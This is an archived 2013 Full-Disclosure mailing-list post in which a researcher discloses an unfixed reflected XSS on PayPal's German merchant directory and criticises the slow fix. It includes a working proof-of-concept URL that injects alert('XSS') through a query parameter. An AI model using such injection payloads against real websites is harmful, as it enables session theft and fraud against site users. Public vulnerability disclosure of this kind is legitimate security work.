[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Yet another (unpaid and unfixed) Paypal XSS

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Yet another (unpaid and unfixed) Paypal XSS
From: samuel alp <samuelalp95@xxxxxxxxx>
Date: Thu, 13 Jun 2013 11:14:56 +0200

Hi People

Found a XSS on german Paypal website last week and reported it exactly 7
days ago.
Their response was one we very well know
Another researcher already discovered the bug.

So, someone else found the Vulnerability before me and reported it.
Fine, looks like I was too slow. I can live with that.

Now, i received an answer exactly 7 Days ago. That means they had more than
a week to fix this


https://www.paypal.de/Einkaufswelt/H%C3%A4ndlerverzeichnis/?c="; ||
alert('XSS') || "

All they'd have to do is escape quotation marks or remove them since
they're not used anyways.
The Approximate time that takes is ~15 Seconds.

I am amazed by how long it takes some huge companys to close holes in their
websites



______________________________________________________
Samuel Alp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs
Next by Date: [Full-disclosure] libpcap: 2 concurrent threads acquiring on the same interface
Previous by thread: [Full-disclosure] [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary File Upload
Next by thread: [Full-disclosure] libpcap: 2 concurrent threads acquiring on the same interface
Index(es):
- Date
- Thread